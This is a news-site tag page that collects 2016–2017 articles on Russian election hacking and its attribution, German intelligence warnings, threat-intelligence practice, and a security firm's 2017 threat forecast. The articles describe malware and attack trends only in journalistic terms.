14.6 C
London
Tuesday, September 26, 2017
Home Tags Information Warfare

Tag: Information Warfare

Shortage of skilled “cyber operators” has services scrambling to find ways to recruit.
Facebook's security team doesn't disagree with the US Director of National Intelligence's conclusion that Russia tried to sway the US Presidential election.
Enlarge / Julian Assange's Wikileaks is shocked—shocked—that someone would leak secrets for political reasons.Ben Stansall/AFP via Getty Images reader comments 200 Share this story On Thursday, NBC News broadcast a report claiming to have exclusive details from the top-secret version of the intelligence community report on Russian hacking and information warfare activities delivered to President Barack Obama—a report scheduled to be delivered by intelligence officials to President-elect Donald Trump today. The NBC report followed a Washington Post report based on information from anonymous “US officials” about intercepted communications between Russian leaders celebrating Donald Trump’s election as a victory. The NBC report drew an instant rebuke via Twitter from Trump. WikiLeaks, which has previously published leaked highly classified US intelligence data, cried foul over the leaks. How did NBC get "an exclusive look into the top secret report he (Obama) was presented?" Who gave them this report and why? Politics! — Donald J. Trump (@realDonaldTrump) January 6, 2017 The Obama admin/CIA is illegally funneling TOP SECRET//COMINT information to NBC for political reasons before PEOTUS even gets to read it. — WikiLeaks (@wikileaks) January 6, 2017 The parade of leaks regarding the US intelligence assessment about Russian hacking is notable given the Obama administration’s past crackdown on leaks, which has included a record number of prosecutions against those leaking information to journalists. The leaks are likely motivated by Trump’s frequent dismissal of official intelligence community statements regarding the alleged involvement of the Russian government in the hacking and dissemination of information from the Democratic National Committee and the Clinton campaigns. According to the NBC report, the 50-plus page classified version of the intelligence community report details Russian digital espionage operations dating as far back as 2008, including the breach of e-mail systems at the White House, State Department, the Joint Chiefs of Staff, and US corporations, in addition to the attacks focused on the DNC and the Hillary Clinton presidential campaign. Those details would present a more complete picture of the various "threat groups" lumped into the recent FBI/Department of Homeland Security Joint Analysis Report as "Grizzly Steppe." President Obama has not yet received the report, but he was given a briefing on its contents on Thursday. A final Top Secret, Compartmented Information version of the report will be delivered to cleared members of the administration and the Trump transition team today; Congress will receive a classified version of the report on Monday, and an unclassified version is expected to be made public early next week. Early today, in an interview with the New York Times, Trump referred to the intelligence community's focus on the Russian hacking a politically-motivated attack against him. Referencing the breach of the Office of Personnel Management, Trump said, “China, relatively recently, hacked 20 million government names, How come nobody even talks about that? This is a political witch hunt.”
Enlarge / (L-R) Defense Undersecretary for Intelligence Marcell Lettre II, Director of National Intelligence James Clapper, and United States Cyber Command and National Security Agency Director Admiral Michael Rogers testify before the Senate Armed Services Committee.Chip Somodevilla / Getty Images reader comments 38 Share this story In a hearing before the Senate Armed Services Committee—a regularly scheduled unclassified briefing on "foreign cyber threats"—Director of National Intelligence James Clapper did very little to preview a report on Russian "cyber" activities around the US elections scheduled to be delivered to President Barack Obama this week.

Clapper did say that an unclassified version of the report would be released to the public early next week. However, that version is unlikely to contain any new specific evidence to support the intelligence community's assertions that the Russian government directed hacking and propaganda operations against Hillary Clinton and the Democratic Party in an attempt to deliberately affect the outcome of the US election. "We plan to brief the Congress and release an unclassified version of this report early next week, with due deference to the protection of highly fragile sources and methods," Clapper said in his opening statement. "We have invested billions, and we put people's lives at risk to get such information.
If we were to expose how we got this, we could just kiss that off. We're going to be as forthcoming as possible." Clapper and National Security Agency Director Admiral Michael Rogers both asserted, however, that the intelligence community was even more certain of Putin's involvement in the meddling in the US election than they were when the Department of Homeland Security (DHS) and the Office of the Director of National Intelligence issued a joint statement in October. "We stand more resolutely now on that statement than we did on the seventh of October," Clapper said. While Clapper said it was almost certain that no votes had been changed by hacking, he noted there was no way to determine the full impact of Russia's information campaign on voters' opinions—"We in the Intelligence Community can't tally that." Much of what Clapper and Rogers said in their testimony echoes data already available from commercial security firms and other sources, as well as the somewhat limited data shared in the DHS-FBI "joint analysis report" (JAR) issued last week.

The report to be delivered to the president will, however, take in the whole of the alleged Russian campaign to influence the election, including the use of Russian state-funded media, social media, and "fake news" to spread disinformation.

The report will likely also include specific data on how the intelligence community linked Putin to the sharing of breached data from the Democratic National Committee and others (including Clinton Campaign Chairman John Podesta) to Wikileaks. In response to a question from the committee on the role of "fake news" disinformation in Russia's election meddling, Clapper said, "Without getting too far in front of the headlights of [the upcoming report], this was a multifaceted campaign—the hacking was only one part of it.
It also entailed classical propaganda, disinformation, and fake news." Clapper acknowledged that the same sort of campaign was ongoing in Europe now, around the upcoming French and German elections. That mirrors forensic evidence that Ars has examined recently in our attempts to connect the dots between operations from the organization behind the "Fancy Bear" group of malware, tools and infrastructure used in the DNC, Democratic Congressional Campaign Committee, and Clinton campaign breaches, and the theft of data from the World Anti-Doping Agency (WADA).
Servers used in connection with some of the spear phishing attacks connected to these breaches have been also used to target French Gmail users recently. (More details of that activity and how it is connected to the information campaign against the Democrats in the US elections are being pulled together for an upcoming Ars report.) Many of the senators from both parties on the Armed Services Committee, including Sen. John McCain (R-Ariz.) and Senator Lindsey Graham (R-S.C.) threw barbs at President-elect Donald Trump for his treatment of the intelligence community and his posts apparently professing greater trust in Julian Assange than US intelligence.

Citing Assange as "the one responsible for publishing the names of people who worked for us" in Iraq and Afghanistan plus the subject of a criminal investigation, McCain asked Clapper and Rogers, "Do you think there's any credibility that we should attach to his statements?" Clapper replied frankly: "Not in my view." For his part, Donald Trump tried to back away from the appearance of endorsing Assange via Twitter: "The dishonest media likes saying that I am in Agreement with Julian Assange - wrong.
I simply state what he states, it is for the people.... to make up their own minds as to the truth.

The media lies to make it look like I am against "Intelligence" when in fact I am a big fan!" Graham was particularly angry at Trump for being overly critical and disrespectful of the intelligence community. "You don't want to undermine those people serving in this arena," he said. He also suggested Obama's sanctions against Russia amounted to "throwing pebbles" when it was time to "throw rocks," because the active campaign to interfere in the US election went far beyond passive espionage. Graham noted that Republicans should be concerned that someone else might do the same thing to them if Trump were to take on China or Iran, and the response to the Russian information operations was an opportunity to deter future interference in the democratic process. “It’s not like we’re so much better at cyber security than Democrats,” he said. Another area Graham focused on was the US Information Agency, the government operator of Radio Free Europe, and other US foreign information operations. He suggested this agency was too archaic in its focus on broadcasting.

Clapper agreed, saying in his closing remarks that what was needed to counter information warfare was a "USIA on steroids"—a new information organization that could take on misinformation from adversaries more aggressively in social media and other places online as well as in the broadcast realm. Russia has used the state-funded RT broadcast service and other outlets to more aggressively spread its version of the global narrative over the past few years.

The country has reportedly even used "troll factories" to create confusion and support nationalist populism in several European countries.
You must be prepared for foreseeable attacks as well as the ones that sneak up on you. Organizations deal with two types of cyberthreats: hurricanes and earthquakes. Hurricanes are those attacks you can see coming; earthquakes, you can't. Both are inevitable, and you need to plan and take action accordingly. This starts with an understanding of what threat intelligence is and how to make it relevant and actionable. Threat intelligence can help you transition from constantly reacting to being proactive. It allows you to prepare for the hurricanes and respond to the earthquakes with an efficient, integrated approach.   Eliminate Noise Mention threat intelligence and most organizations think about multiple data feeds to which they subscribe — commercial sources, open source, and additional feeds from security vendors — each in a different format and most without any context to allow for prioritization. This global threat data gives some insight into activities happening outside of your enterprise — not only attacks themselves, but how attackers are operating and infiltrating networks. The challenge is that most organizations suffer from data overload. Without the tools and insights to automatically sift through mountains of disparate global data and aggregate it for analysts and action, this threat data becomes noise: you have alerts around attacks that aren't contextualized, relevant, or a priority. To make more effective use of this data, it must be aggregated in one manageable location and translated into a uniform format so that you can automatically get rid of the noise and focus on what's important. Focus on Threats With global threat data organized, you can focus on the hurricanes and earthquakes that threaten your organization. Hurricanes are the threats you know about, can prepare for, protect against, and anticipate based on past trends. For example, based on research, say that we know a file is malware. This intelligence should be operationalized — turned into a policy, a rule, or signature and sent to the appropriate sensor — so that it can prevent bad actors from stealing valuable data, creating a disruption, or causing damage. As security operations become more mature, you can start to get alerts on these known threats in addition to automatically blocking them so you can learn more about the adversary. This allows you to focus on the attacks that really matter. Earthquakes are unknown threats, or threats that you may not have adequate countermeasures against, that have bypassed existing defenses. Once they're inside the network, your job is to detect, respond, and recover. This hinges on the ability to turn global threat data into threat intelligence by enriching that data with internal threat and event data and allowing analysts to collaborate for better decision making. Threat intelligence helps you better scope the campaign once the threat is detected, learn more about the adversary, and understand affected systems and how to best remediate. By correlating events and associated indicators from inside your environment (e.g., SIEM alerts or case management records) with external data on indicators, adversaries, and their methods, you gain the context to understand the who, what, when, where, why, and how of an attack. Going a step further, applying context to your business processes and assets helps you assess relevance. Is anything the organization cares about at risk? If the answer is "no," then what you suspected to be a threat is low priority. If the answer is "yes," then it's a threat. Either way, you have the intelligence you need to quickly take action. Make Intelligence Actionable Intelligence has three attributes that help define "actionable." Accuracy: Is the intelligence reliable and detailed? Relevance: Does the intelligence apply to your business or industry? Timeliness: Is the intelligence being received with enough time to do something? An old industry joke is that you can only have two of the three, so you need to determine what's most important to your business. If you need intelligence as fast as possible to deploy to your sensors, then accuracy may suffer and you might expect some false positives. If the intelligence is accurate and timely, then you may not have been able to conduct thorough analysis to determine if the intelligence is relevant to your business. This could result in expending resources on something that doesn't present a lot of risk. Ultimately, the goal is to make threat intelligence actionable. But actionable is defined by the user. The security operations center typically looks for IP addresses, domain names, and other indicators of compromise — anything that will help to detect and contain a threat and prevent it in the future. For the network team, it's about hardening defenses with information on vulnerabilities, signatures, and rules to update firewalls, and patch and vulnerability management systems. The incident response team needs intelligence about the adversary and the campaigns involved so they can investigate and remediate. And the executive team and board need intelligence about threats in business terms — the financial and operational impact — in order to increase revenue and protect shareholders and the company as a whole. Analysts must work together and across the organization to provide the right intelligence in the right format and with the right frequency so that it can be used by multiple teams. Operationalizing threat intelligence takes time and a plan. Many organizations are already moving from a reactive mode to being more proactive. But to make time to look out at the horizon and see and prepare for hurricanes while also dealing with earthquakes, organizations need to move to an anticipatory model with contextual intelligence, relevance, and visibility into trends in the threat landscape. Related Content: As Senior VP of Strategy of ThreatQuotient, Jonathan Couch utilizes his 20+ years of experience in information security, information warfare, and intelligence collection to focus on the development of people, process, and technology within client organizations to assist in ... View Full Bio More Insights
Enlarge / Trump denies there's any truth intelligence community claims of Russian interference in the election, claiming it could have been anyone.Chip Somodevilla | Getty Images reader comments 159 Share this story President-elect Donald Trump continues to discount or attempt to discredit reports that the intelligence community has linked the hacking of the DNC, the Hillary Clinton presidential campaign, and related information operations with a Russian effort to prevent Clinton from winning the election—thus assuring Trump's victory. In his latest of a stream of tweets, Trump posted: Unless you catch "hackers" in the act, it is very hard to determine who was doing the hacking. Why wasn't this brought up before election? — Donald J. Trump (@realDonaldTrump) December 12, 2016 The hacking was brought up well before the election. And it was monitored as it was happening—by the intelligence and law enforcement communities and by private information security firms. "CrowdStrike's Falcon endpoint technology did catch the adversaries in the act," said Dmitri Alperovitch, chief technology officer of Crowdstrike. "When the DNC brought us in to conduct an investigation in May 2016, we deployed this technology on every system within DNC's corporate network and were able to watch everything that the adversaries were doing while we were working on a full remediation plan to remove them from the network." Much of the evidence from Crowdstrike and other security researchers has been public since June and July. But while the hackers may have been caught in the act digitally, the details by themselves don't offer definitive proof of the identity of those behind the anti-Clinton hacking campaign. Public details currently don't offer clear insight into the specific intent behind these hacks, either. What is indisputable, however, is the existence of genuine hacking evidence. And this information certainly does provide enough to give the reported intelligence community findings some context. The evidence The FBI warned the DNC of a potential ongoing breach of their network in November of 2015. But the first hard evidence of an attack detected by a non-government agency was a spear-phishing campaign being tracked by Dell SecureWorks. That campaign began to target the DNC, the Clinton campaign, and others in the middle of March 2016, and it ran through mid-April. This campaign was linked to a "threat group" (designated variously as APT28, Sofacy, Strontium, Pawn Storm, and Fancy Bear) that had previously been tied to spear-phishing attacks on military, government, and non-governmental organizations. "[SecureWorks] researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government," the report from SecureWorks concluded. The DNC's information technology team first alerted party officials that there was a potential security problem in late March, but the DNC didn't bring in outside help until May. This is when CrowdStrike's incident response team was brought in. CrowdStrike identified two separate ongoing breaches, as detailed in a June 15, 2016 blog post by CrowdStrike CTO Dmitri Alperovitch. The findings were based both on malware samples found and a monitoring of the breach while it was in progress. One of those attacks, based on the malware and command and control traffic, was attributed to Fancy Bear. The malware deployed by Fancy Bear was a combination of an agent disguised as a Windows driver file (named twain_64.dll) in combination with a network tunneling tool that allowed remote control connections. The other breach, which may have been the breach hinted at by the FBI, was a long-running intrusion by a group previously identified as APT29, also known as The Dukes or Cozy Bear. Cozy Bear ran SeaDaddy (also known as SeaDuke, a backdoor developed in Python and compiled as a Windows executable) as well as a one-line Windows PowerShell command that exploited Microsoft's Windows Management Instrumentation (WMI) system. The exploit allowed attackers to persist in WMI's database and execute based on a schedule. Researchers at Fidelis who were given access to malware samples from the hack confirmed that attribution. In addition to targeting the DNC and the Clinton campaign's Google Apps accounts, the spear-phishing messages connected to the campaign discovered by SecureWorks also went after a number of personal Gmail accounts. It was later discovered that the campaign had compromised the Gmail accounts of Clinton campaign chair John Podesta, former Secretary of State Colin Powell, and a number of other individuals connected to the Clinton campaign and the White House. Many of those e-mails ended up on DC Leaks. The Wikileaks posting of the Podesta e-mails include an e-mail containing the link used to deliver the malware. After Crowdstrike and the DNC revealed the hacks and attributed them to Russian intelligence-connected groups, some of the files taken from the DNC were posted on a website by someone using the name Guccifer 2.0. While the individual claimed to be Romanian, documents in the initial dump from the DNC by Guccifer 2.0 were found to have been edited using a Russian-language version of Word and by someone using a computer named for Felix Dzerzhinsky, founder of the Soviet secret police. (The documents are linked in this article by Ars' Dan Goodin.) In addition to publishing on his or her own WordPress site, Guccifer used the DC Leaks site to provide an early look at new documents to The Smoking Gun using administrative access. The Smoking Gun contacted one of the victims of the breach and confirmed he had been targeted using the same spear-phishing attack used against Podesta. The DC Leaks site also contains a small number of e-mails from state Republican party operatives. Thus far, no national GOP e-mails have been released. (The New York Times reports that intelligence officials claim the Republican National Committee was also penetrated by attackers, but its e-mails were never published.) Attribution and motive There are several factors used to attribute these hacks to someone working on behalf of Russian intelligence. In the case of Fancy Bear, attribution is based on details from a number of assessments by security researchers. These include: Focus of purpose. The methods and malware families used in these campaigns are specifically built for espionage. The targets. A list of previous targets of Fancy Bear malware include: Individuals in Russia and the former Soviet states who may be of intelligence interest Current and former members of NATO states' government and military Western defense contractors and suppliers Journalists and authors Fancy Bear malware was also used in the spear-phishing attack on the International Olympic Committee to gain access to the World Anti Doping Agency's systems. This allowed the group to discredit athletes after many Russian athletes were banned from this year's Summer Games. Long-term investment. The code in malware and tools is regularly and professionally updated and maintained—while maintaining a platform approach. The investment suggests an operation funded to provide long-term data espionage and information warfare capabilities. Language and location. Artifacts in the code indicate it was written by Russian speakers in the same time zone as Moscow and St. Petersburg, according to a FireEye report. These don't necessarily point to Fancy Bear being directly operated by Russian intelligence. Other information operations out of Russia (including the "troll factory" operated out of St. Petersburg to spread disinformation and intimidate people) have had tenuous connections to the government. Scott DePasquale and Michael Daly of the Atlantic Council suggested in an October Politico article that the DNC hack and other information operations surrounding the US presidential campaign may have been the work of "cyber mercenaries"—in essence, outsourcing outfits working as contractors for Russian intelligence. There is also an extremely remote possibility that all of this has been some sort of "false flag" operation by someone else with extremely deep pockets and a political agenda. WikiLeaks' Julian Assange has insisted that the Russian government is not the source of the Podesta and DNC e-mails. That may well be true, and it can still be true even if the Russian government had a hand in directing or funding the operation. But that is all speculation—the only way that the full scope of Russia's involvement in the hacking campaign and other aspects of the information campaign against Clinton (and for Trump) will be known is if the Obama administration publishes conclusive evidence in a form that can be independently analyzed.
Enlarge / The bear is back.
It never went away.reader comments 40 Share this story US intelligence agencies have been forthright in their insistence that the Russian government was behind not only the hacking of the Democratic National Committee (DNC) and other political organizations in the US, but a concerted effort to undermine confidence in the results of the US presidential election, including attacks on state election officials' systems.

But the US is not the only country that the Russian government has apparently targeted for these sorts of operations—and the methods used in the DNC hack are being applied increasingly in attempts to influence German politics, Germany's chief of domestic intelligence warned yesterday. In a press release issued on December 8, Germany's Bundesamt für Verfassungsshutz (BfV), the country's domestic intelligence agency, warned of an ever-mounting wave of disinformation and hacking campaigns by Russia focused on increasing the strength of "extremist groups and parties" in Germany and destabilizing the German government.
In addition to propaganda and disinformation campaigns launched through social media, the BfV noted an increased number of "spear phishing attacks against German political parties and parliamentary groups" using the same sort of malware used against the Democratic National Committee in the US. The statement from the BfV came on the same day that Alex Younger, the chief of the United Kingdom's Secret Intelligence Service (MI6) made more veiled references to disinformation and hacking campaigns.
In remarks Younger delivered at Vauxhall Cross, MI6 headquarters, he warned of the mounting risks posed by "hybrid warfare." "The connectivity that is at the heart of globalization can be exploited by States with hostile intent to further their aims deniably," Younger said. "They do this through means as varied as cyber-attacks, propaganda or subversion of democratic process… The risks at stake are profound and represent a fundamental threat to our sovereignty; they should be a concern to all those who share democratic values." The statement from the BfV follows one by German Chancellor Angela Merkel last week voicing concerns that Russia would attempt to interfere in the 2017 German elections.
In the release, BfV Chief Hans-Georg Maassen warned that these "propaganda and disinformation attacks, cyber espionage, and cyber sabotage are part of hybrid threats against Western democracies." He added that the way people use social media to obtain news was aiding disinformation campaigns. "We are concerned that echo chambers are emerging that make the formation of domestic political opinions highly vulnerable to automated opinion-shaping," Maassen warned. The campaign includes the "enormous use of financial resources" to fund disinformation campaigns, the BfV reported.

The disinformation campaigns have been accompanied by an increase in targeted malware attacks on German politicians.

The BfV attributed these attacks to the threat group known as APT 28, also known as Fancy Bear—a group that US intelligence and information security researchers have tied to Russian intelligence.
In 2015, APT 28 "successfully exfiltrated data from the German Bundestag," Germany's parliament, the BfV release noted. Many of these attacks have been launched as "false flag" operations—with the attackers posing as "hacktivists," much as Guccifer 2.0 and the DC Leaks campaigns tied to APT 28 did. The combined use of disinformation in social media and in state-funded media, social media "trolling," and concerted hacking efforts against political institutions is part of a long pattern of behavior by Russia, shaped by Russia's doctrine of information warfare and deterrence. Russia is generally believed to have been behind cyber-attacks and propaganda operations against Estonia and Ukraine, among other former Soviet states, and has reportedly been behind similar operations in Poland. Given the effect that the DNC hack and other information warfare had in the US—not necessarily influencing the final results, but creating the impression that Russia could directly interfere in US politics—Estonian Foreign Minister Sven Mikser told Reuters at a meeting of the Organization for Security and Cooperation in Europe on December 8, "It's a pretty safe bet that they will try to do it again, and they will try to surprise us.

That’s something that we should be very careful to look at and try to protect ourselves from."
 Download the PDF Yet another year has flown past and, as far as notable infosec happenings are concerned, this is one for the history books.

Drama, intrigue and exploits have plagued 2016 and, as we take stock of some of the more noteworthy stories, we once again cast our gaze forward to glean the shapes of the 2017 threat landscape. Rather than thinly-veiled vendor pitching, we hope to ground these predictions in trends we’ve observed in the course of our research and provide thought-provoking observations for researchers and visitors to the threat intelligence space alike. Our record Last year’s predictions fared well, with some coming to fruition ahead of schedule.
In case you didn’t commit these to memory, some of the more notable predictions included: APTs: We anticipated a decreased emphasis on persistence as well as an increased propensity to hide in plain sight by employing commodity malware in targeted attacks. We’ve seen this, both with an increase in memory or fileless malware as well as through the myriad reported targeted attacks on activists and companies, which relied on off-the-shelf malware like NJRat and Alienspy/Adwind. Ransomware: 2016 can be declared the year of ransomware.

Financial malware aimed at victimizing users has practically been galvanized into a ransomware-only space, with the more effective extortion scheme cannibalizing malware development resources from less profitable attempts at victimizing users. Forecast for 2017: time to start using Yara rules more extensively as IoCs become less effective Tweet More Bank Heists: When we considered the looming expansion of financial crime at the highest level, our hypothetical included targeting institutions like the stock exchange.

But it was the attacks on the SWIFT network that brought these predictions to bear, with millions walking out the door thanks to crafty, well-placed malware. Internet Attacks: Most recently, the oft-ignored world of sub-standard Internet-connected devices finally came to bear on our lives in the form of a nasty IoT botnet that caused outages for major Internet services, and hiccups for those relying on a specific DNS provider. Shame: Shame and extortion have continued to great fanfare as strategic and indiscriminate dumps have caused personal, reputational, and political problems left and right. We must admit that the scale and victims of some of these leaks have been genuinely astonishing to us. What does 2017 have in store? Those dreaded APTs The rise of bespoke and passive implants As hard as it is to get companies and large-scale enterprises to adopt protective measures, we also need to admit when these measures start to wear thin, fray, or fail.
Indicators of Compromise (IoCs) are a great way to share traits of already known malware, such as hashes, domains, or execution traits that will allow defenders to recognize an active infection. However, the trendsetting one-percenters of the cyberespionage game have known to defend against these generalized measures, as showcased by the recent ProjectSauron APT, a truly bespoke malware platform whose every feature was altered to fit each victim and thus would not serve to help defenders detect any other infections.

That is not to say that defenders are entirely without recourse but it’s time to push for the wider adoption of good Yara rules that allow us to both scan far-and-wide across an enterprise, inspect and identify traits in binaries at rest, and scan memory for fragments of known attacks. Forecast for 2017: passive implants showing almost no signs of infection come into fashion Tweet ProjectSauron also showcased another sophisticated trait we expect to see on the rise, that of the ‘passive implant’.

A network-driven backdoor, present in memory or as a backdoored driver in an internet gateway or internet-facing server, silently awaiting magic bytes to awaken its functionality. Until woken by its masters, passive implants will present little or no outward indication of an active infection, and are thus least likely to be found by anyone except the most paranoid of defenders, or as part of a wider incident response scenario. Keep in mind that these implants have no predefined command-and-control infrastructure to correlate and provide a more anonymous beachhead.

Thus, this is the tool of choice for the most cautious attackers, who must ensure a way into a target network at a moment’s notice. Ephemeral infections While adoption of PowerShell has risen as a dream tool for Windows administrators, it has also proven fruitful ground for the gamut of malware developers looking for stealthy deployment, lateral movement, and reconnaissance capabilities unlikely to be logged by standard configurations.

Tiny PowerShell malware stored in memory or in the registry is likely to have a field day on modern Windows systems.

Taking this further, we expect to see ephemeral infections: memory-resident malware intended for general reconnaissance and credential collection with no interest in persistence.
In highly sensitive environments, stealthy attackers may be satisfied to operate until a reboot wipes their infection from memory if it means avoiding all suspicion or potential operational loss from the discovery of their malware by defenders and researchers.

Ephemeral infections will highlight the need for proactive and sophisticated heuristics in advanced anti-malware solutions (see: System Watcher). Espionage goes mobile Multiple threat actors have employed mobile implants in the past, including Sofacy, RedOctober and CloudAtlas, as well as customers of HackingTeam and the suspected NSO Pegasus iOS malware suite. However, these have supplemented campaigns largely based on desktop toolkits.

As adoption of Desktop OS’s suffers from a lack of enthusiasm, and as more of the average user’s digital life is effectively transferred to their pockets, we expect to see the rise of primarily mobile espionage campaigns.

These will surely benefit from decreased attention and the difficulty of attaining forensic tools for the latest mobile operating systems.

Confidence in codesigning and integrity checks has stagnated visibility for security researchers in the mobile arena, but this won’t dissuade determined and well-resourced attackers from hunting their targets in this space. The future of financial attacks We heard you’d like to rob a bank… The announcement of this year’s attacks on the SWIFT network caused uproar throughout the financial services industry due to its sheer daring; measured in zeros and commas to the tune of multi-million dollar heists.

This move was a natural evolution for players like the Carbanak gang and perhaps other interesting threat actors. However, these cases remain the work of APT-style actors with a certain panache and established capability.
Surely, they’re not the only ones interested in robbing a bank for sizable funds? Forecast for 2017: growing popularity of short-lived infections, including those using PowerShell Tweet As cybercriminal interest grows, we expect to see the rise of the SWIFT-heist middlemen in the well-established underground scheme of tiered criminal enterprises. Performing one of these heists requires initial access, specialized software, patience, and, eventually, a money laundering scheme.

Each of these steps has a place for already established criminals to provide their services at a fee, with the missing piece being the specialized malware for performing SWIFT attacks. We expect to see the commodification of these attacks through specialized resources being offered for sale in underground forums or through as-a-service schemes. Resilient payment systems As payment systems became increasingly popular and widely adopted, we expected to see greater criminal interest in these. However, it appears that implementations have proven particularly resilient, and no major attacks have been noted at this time.

This relief for the consumer may, however, entail a headache for the payment system providers themselves, as cybercriminals are wont to target the latter through direct attacks on the payment system infrastructure. Whether these attacks will result in direct financial losses or simply outages and disruption, we expect increased adoption to attract more nefarious attention. Dirty, lying ransomware As much as we all hate ransomware (and with good reason), most ransomware thrives on the benefit of an unlikely trust relationship between the victim and their attacker.

This criminal ecosystem relies on the tenet that the attacker will abide by a tacit contract with the victim that, once payment is received, the ransomed files will be returned.

Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling this promise and this has allowed the ecosystem to thrive. However, as the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise. We expect ‘skiddie’ ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return.

At that point, little will distinguish ransomware from wiping attacks and we expect the ransomware ecosystem to feel the effects of a ‘crisis of confidence’.

This may not deter larger, more professional outfits from continuing their extortion campaigns, but it may galvanize forces against the rising ransomware epidemic into abandoning hope for the idea that ‘just pay the ransom’ is viable advice for victims. The big red button The famous Stuxnet may have opened a Pandora’s Box by realizing the potential for targeting industrial systems, but it was carefully designed with a watchful eye towards prolonged sabotage on very specific targets.

Even as the infection spread globally, checks on the payload limited collateral damage and no industrial Armageddon came to pass.
Since then, however, any rumor or reporting of an industrial accident or unexplained explosion will serve as a peg to pin a cyber-sabotage theory on. Forecast for 2017: espionage increasingly shifting to mobile platforms Tweet That said, a cyber-sabotage induced industrial accident is certainly not beyond the realm of possibility.

As critical infrastructure and manufacturing systems continue to remain connected to the internet, often with little or no protection, these tantalizing targets are bound to whet the appetite of well-resourced attackers looking to cause mayhem.
It’s important to note that, alarmism aside, these attacks are likely to require certain skills and intent.

An unfolding cyber-sabotage attack is likely to come hand-in-hand with rising geopolitical tensions and well-established threat actors intent on targeted destruction or the disruption of essential services. The overcrowded internet bites back A brick by any other name Long have we prophesied that the weak security of the Internet of Things (or Threats) will come back to bite us, and behold, the day is here.

As the Mirai botnet showcased recently, weak security in needlessly internet-enabled devices provides an opportunity for miscreants to cause mayhem with little or no accountability. While this is no surprise to the infosec-aficionados, the next step may prove particularly interesting, as we predict vigilante hackers may take matters into their own hands. Forecast for 2017: use of intermediaries in attacks against the SWIFT interbank messaging system Tweet The notion of patching known and reported vulnerabilities holds a certain sacrosanct stature as validation for the hard (and often uncompensated) work of security researchers.

As IoT-device manufacturers continue to pump out unsecured devices that cause wide-scale problems, vigilante hackers are likely to take matters into their own hands.

And what better way than to return the headache to the manufacturers themselves by mass bricking these vulnerable devices? As IoT botnets continue to cause DDoS and spam distribution headaches, the ecosystem’s immune response may very well take to disabling these devices altogether, to the chagrin of consumers and manufacturers alike.

The Internet of Bricks may very well be upon us. The silent blinky boxes The shocking release of the ShadowBrokers dump included a wealth of working exploits for multiple, major manufacturers’ firewalls. Reports of exploitation in-the-wild followed not long after as the manufacturers scrambled to understand the vulnerabilities exploited and issue patches. However, the extent of the fallout has yet to be accounted for. What were attackers able to gain with these exploits on hand? What sort of implants may lie dormant in vulnerable devices? Looking beyond these particular exploits (and keeping in mind the late 2015 discovery of a backdoor in Juniper’s ScreenOS), there’s a larger issue of device integrity that bears further research when it comes to appliances critical to enterprise perimeters.

The open question remains, ‘who’s your firewall working for?’ Who the hell are you? The topic of False Flags and PsyOps are a particular favorite of ours and to no surprise, we foresee the expansion of several trends in that vein… Information warfare The creation of fake outlets for targeted dumps and extortion was pioneered by threat actors like Lazarus and Sofacy.

After their somewhat successful and highly notorious use in the past few months, we expect information warfare operations to increase in popularity for the sake of opinion manipulation and overall chaos around popular processes.

Threat actors interested in dumping hacked data have little to lose from crafting a narrative through an established or fabricated hacktivist group; diverting attention from the attack itself to the contents of their revelations. Forecast for 2017: ‘script kiddie’ extortionists compromise the idea of paying ransom to retrieve data Tweet The true danger at that point is not that of hacking, or the invasion of privacy, but rather that as journalists and concerned citizens become accustomed to accepting dumped data as newsworthy facts, they open the door to more cunning threat actors seeking to manipulate the outcome by means of data manipulation or omission.
Vulnerability to these information warfare operations is at an all-time high and we hope discernment will prevail as the technique is adopted by more players (or by the same players with more throwaway masks). The promise of deterrence As cyberattacks come to play a greater role in international relations, attribution will become a central issue in determining the course of geopolitical overtures.

Governmental institutions have some difficult deliberating ahead to determine what standard of attribution will prove enough for demarches or public indictments.

As precise attribution is almost impossible with the fragmented visibility of different public and private institutions, it may be the case that ‘loose attribution’ will be considered good enough for these. While advising extreme caution is important, we must also keep in mind that there is a very real need for consequences to enter the space of cyberattacks. Our bigger issue is making sure that retaliation doesn’t engender further problems as cunning threat actors outsmart those seeking to do attribution in the first place. We must also keep in mind that as retaliation and consequences become more likely, we’ll see the abuse of open-source and commercial malware begin to increase sharply, with tools like Cobalt Strike and Metasploit providing a cover of plausible deniability that doesn’t exist with closed-source proprietary malware. Doubling-down on False Flags While the examples reported in the False Flags report included in-the-wild cases of APTs employing false flag elements, no true pure false flag operation has been witnessed at this time.

By that we mean an operation by Threat Actor-A carefully and entirely crafted in the style and with the resources of another, ‘Threat Actor-B’, with the intent of inciting tertiary retaliation by the victim against the blameless Threat Actor-B. While it’s entirely possible that researchers have simply not caught onto this already happening, these sorts of operations won’t make sense until retribution for cyberattacks becomes a de facto effect.

As retaliation (be it overtures, sanctions, or retaliatory CNE) becomes more common and impulsive, expect true false flag operations to enter the picture. Forecast for 2017: lack of security for the Internet of Things will turn it into an ‘Internet of Bricks’ Tweet As this becomes the case, we can expect false flags to be worth even greater investment, perhaps even inciting the dumping of infrastructure or even jealously guarded proprietary toolkits for mass use.
In this way, cunning threat actors may cause a momentary overwhelming confusion of researchers and defenders alike, as script kiddies, hacktivists, and cybercriminals are suddenly capable of operating with the proprietary tools of an advanced threat actor, thus providing a cover of anonymity in a mass of attacks and partially crippling the attribution capabilities of an enforcing body. What privacy? Pulling the veil There’s great value to be found in removing what vestiges of anonymity remain in cyberspace, whether for the sake of advertisers or spies.

For the former, tracking with persistent cookies has proven a valuable technique.

This is likely to expand further and be combined with widgets and other innocuous additions to common websites that allow companies to track individual users as they make their way beyond their particular domains, and thus compile a cohesive view of their browsing habits (more on this below). Forecast for 2017: the question “Who is your firewall working for?” will become increasingly relevant Tweet In other parts of the world, the targeting of activists and tracking of social media activities that ‘incite instability’ will continue to inspire surprising sophistication, as deep pockets continue to stumble into curiously well-placed, unheard of companies with novelties for tracking dissidents and activists through the depth and breadth of the internet.

These activities tend to have a great interest in the social networking tendencies of entire geographic regions and how they’re affected by dissident voices. Perhaps we’ll even see an actor so daring as to break into a social network for a goldmine of PII and incriminating information. The espionage ad network No pervasive technology is more capable of enabling truly targeted attacks than ad networks.

Their placement is already entirely financially motivated and there is little or no regulation, as evidenced by recurring malvertising attacks on major sites.

